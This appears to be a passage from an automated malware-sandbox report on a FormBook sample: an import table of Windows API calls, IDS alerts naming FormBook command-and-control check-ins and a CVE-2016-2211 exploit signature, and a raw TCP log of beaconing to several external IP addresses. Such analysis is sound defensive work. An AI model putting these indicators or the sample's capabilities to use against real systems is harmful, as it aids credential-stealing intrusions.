SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                          GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                          COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                          ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                          ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                          OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-05T15:42:07.835082+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.4 | 49730 | TCP
2024-11-05T15:42:24.713888+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49736 | 3.33.130.190 | 80 | TCP
2024-11-05T15:42:40.580377+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49737 | 3.33.130.190 | 80 | TCP
2024-11-05T15:42:44.059393+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49738 | 3.33.130.190 | 80 | TCP
2024-11-05T15:42:46.606255+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49739 | 3.33.130.190 | 80 | TCP
2024-11-05T15:42:47.759944+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.4 | 49741 | TCP
2024-11-05T15:42:48.266162+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49742 | 3.33.130.190 | 80 | TCP
2024-11-05T15:42:54.246835+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49772 | 213.249.67.10 | 80 | TCP
2024-11-05T15:42:57.137402+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49783 | 213.249.67.10 | 80 | TCP
2024-11-05T15:42:59.653067+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49798 | 213.249.67.10 | 80 | TCP
2024-11-05T15:43:03.246847+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49814 | 213.249.67.10 | 80 | TCP
2024-11-05T15:43:09.074514+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49854 | 3.33.130.190 | 80 | TCP
2024-11-05T15:43:12.512491+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49870 | 3.33.130.190 | 80 | TCP
2024-11-05T15:43:15.060401+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49884 | 3.33.130.190 | 80 | TCP
2024-11-05T15:43:31.948296+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49900 | 3.33.130.190 | 80 | TCP
2024-11-05T15:43:38.496790+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50016 | 3.33.130.190 | 80 | TCP
2024-11-05T15:43:40.155976+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50017 | 3.33.130.190 | 80 | TCP
2024-11-05T15:43:42.721431+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50018 | 3.33.130.190 | 80 | TCP
2024-11-05T15:43:45.254236+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50019 | 3.33.130.190 | 80 | TCP
2024-11-05T15:43:51.189788+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50020 | 161.97.142.144 | 80 | TCP
2024-11-05T15:43:53.720367+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50021 | 161.97.142.144 | 80 | TCP
2024-11-05T15:43:56.255680+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50022 | 161.97.142.144 | 80 | TCP
2024-11-05T15:43:58.817264+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50023 | 161.97.142.144 | 80 | TCP
2024-11-05T15:44:05.012335+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50024 | 8.217.17.192 | 80 | TCP
2024-11-05T15:44:07.824897+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50025 | 8.217.17.192 | 80 | TCP
2024-11-05T15:44:10.344137+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50026 | 8.217.17.192 | 80 | TCP
2024-11-05T15:44:12.934203+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50027 | 8.217.17.192 | 80 | TCP
2024-11-05T15:44:19.746712+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50028 | 78.141.202.204 | 80 | TCP
2024-11-05T15:44:22.327458+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50029 | 78.141.202.204 | 80 | TCP
2024-11-05T15:44:24.856082+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50030 | 78.141.202.204 | 80 | TCP
2024-11-05T15:44:27.387334+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50031 | 78.141.202.204 | 80 | TCP
2024-11-05T15:44:33.583073+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50032 | 184.94.215.26 | 80 | TCP
2024-11-05T15:44:36.379438+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50033 | 184.94.215.26 | 80 | TCP
2024-11-05T15:44:38.988721+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50034 | 184.94.215.26 | 80 | TCP
2024-11-05T15:44:41.510743+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50035 | 184.94.215.26 | 80 | TCP
2024-11-05T15:44:48.065467+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50036 | 3.33.130.190 | 80 | TCP
2024-11-05T15:44:50.599779+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50037 | 3.33.130.190 | 80 | TCP
2024-11-05T15:44:53.173155+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50038 | 3.33.130.190 | 80 | TCP
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Nov 5, 2024 15:43:42.721431017 CET5001880192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:43.590547085 CET5001880192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:43.595345974 CET80500183.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:44.610708952 CET5001980192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:44.615696907 CET80500193.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:44.615781069 CET5001980192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:44.625415087 CET5001980192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:44.630378962 CET80500193.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:45.253613949 CET80500193.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:45.254185915 CET80500193.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:45.254235983 CET5001980192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:45.257038116 CET5001980192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:43:45.261926889 CET80500193.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:43:50.320151091 CET5002080192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:50.324979067 CET8050020161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:50.325586081 CET5002080192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:50.337434053 CET5002080192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:50.342205048 CET8050020161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:51.189727068 CET8050020161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:51.189743042 CET8050020161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:51.189788103 CET5002080192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:51.324601889 CET8050020161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:51.324665070 CET5002080192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:51.843545914 CET5002080192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:52.860265970 CET5002180192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:52.865078926 CET8050021161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:52.865207911 CET5002180192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:52.877991915 CET5002180192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:52.883650064 CET8050021161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:53.720088005 CET8050021161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:53.720257998 CET8050021161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:53.720366955 CET5002180192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:53.858901024 CET8050021161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:53.861474991 CET5002180192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:54.387994051 CET5002180192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:55.407521963 CET5002280192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:55.412586927 CET8050022161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:55.412662029 CET5002280192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:55.427784920 CET5002280192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:55.432975054 CET8050022161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:55.432986975 CET8050022161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:55.432996035 CET8050022161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:55.433022976 CET8050022161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:55.433032990 CET8050022161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:55.433042049 CET8050022161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:55.433185101 CET8050022161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:55.433195114 CET8050022161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:55.433203936 CET8050022161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:56.255413055 CET8050022161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:56.255562067 CET8050022161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:56.255680084 CET5002280192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:56.554655075 CET8050022161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:56.554707050 CET5002280192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:56.934681892 CET5002280192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:57.953531027 CET5002380192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:57.958405972 CET8050023161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:57.958509922 CET5002380192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:57.965922117 CET5002380192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:57.971359968 CET8050023161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:58.817068100 CET8050023161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:58.817099094 CET8050023161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:58.817107916 CET8050023161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:58.817148924 CET8050023161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:58.817264080 CET5002380192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:58.817302942 CET5002380192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:58.942724943 CET8050023161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:58.942842960 CET5002380192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:58.943913937 CET5002380192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:58.948770046 CET8050023161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:44:03.976079941 CET5002480192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:03.981013060 CET80500248.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:03.981153011 CET5002480192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:03.992121935 CET5002480192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:03.996998072 CET80500248.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:04.961210012 CET80500248.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:05.012335062 CET5002480192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:05.155457973 CET80500248.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:05.155507088 CET5002480192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:05.496999979 CET5002480192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:06.517436028 CET5002580192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:06.777069092 CET80500258.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:06.777169943 CET5002580192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:06.791482925 CET5002580192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:06.796647072 CET80500258.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:07.782651901 CET80500258.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:07.824897051 CET5002580192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:07.973978043 CET80500258.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:07.974092960 CET5002580192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:08.297414064 CET5002580192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:09.313631058 CET5002680192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:09.318690062 CET80500268.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:09.318768024 CET5002680192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:09.332849979 CET5002680192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:09.337869883 CET80500268.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:09.337949991 CET80500268.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:09.337960005 CET80500268.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:09.337969065 CET80500268.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:09.337980032 CET80500268.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:09.338068008 CET80500268.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:09.338078976 CET80500268.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:09.338155985 CET80500268.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:09.338398933 CET80500268.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:10.292805910 CET80500268.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:10.344136953 CET5002680192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:10.476053953 CET80500268.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:10.481564999 CET5002680192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:10.840574980 CET5002680192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:11.861429930 CET5002780192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:11.866647005 CET80500278.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:11.866764069 CET5002780192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:11.874686003 CET5002780192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:11.879626989 CET80500278.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:12.878463030 CET80500278.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:12.934202909 CET5002780192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:13.051367044 CET80500278.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:13.051529884 CET5002780192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:13.052556038 CET5002780192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:13.057296991 CET80500278.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:18.885616064 CET5002880192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:18.890543938 CET805002878.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:18.890630960 CET5002880192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:18.905379057 CET5002880192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:18.911243916 CET805002878.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:19.697069883 CET805002878.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:19.746711969 CET5002880192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:19.804513931 CET805002878.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:19.804589033 CET5002880192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:20.419414043 CET5002880192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:21.438034058 CET5002980192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:21.443327904 CET805002978.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:21.443411112 CET5002980192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:21.456774950 CET5002980192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:21.461702108 CET805002978.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:22.279025078 CET805002978.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:22.327457905 CET5002980192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:22.386168957 CET805002978.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:22.387571096 CET5002980192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:22.965533972 CET5002980192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:23.988064051 CET5003080192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:23.992954016 CET805003078.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:23.995584965 CET5003080192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:24.009546995 CET5003080192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:24.014434099 CET805003078.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:24.014441013 CET805003078.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:24.014451981 CET805003078.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:24.014467001 CET805003078.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:24.014471054 CET805003078.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:24.014480114 CET805003078.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:24.014514923 CET805003078.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:24.014575958 CET805003078.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:24.014750957 CET805003078.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:24.812372923 CET805003078.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:24.856081963 CET5003080192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:24.927232027 CET805003078.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:24.927447081 CET5003080192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:25.512358904 CET5003080192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:26.531744003 CET5003180192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:26.537327051 CET805003178.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:26.537424088 CET5003180192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:26.547631979 CET5003180192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:26.552622080 CET805003178.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:27.334160089 CET805003178.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:27.387334108 CET5003180192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:27.440643072 CET805003178.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:27.440797091 CET5003180192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:27.441895962 CET5003180192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:27.449146986 CET805003178.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:32.871155977 CET5003280192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:32.877253056 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:32.877336025 CET5003280192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:32.889556885 CET5003280192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:32.897651911 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:33.582989931 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:33.583009958 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:33.583020926 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:33.583072901 CET5003280192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:33.583159924 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:33.583172083 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:33.583183050 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:33.583194017 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:33.583220005 CET5003280192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:33.583247900 CET5003280192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:33.583440065 CET8050032184.94.215.26192.168.2.4
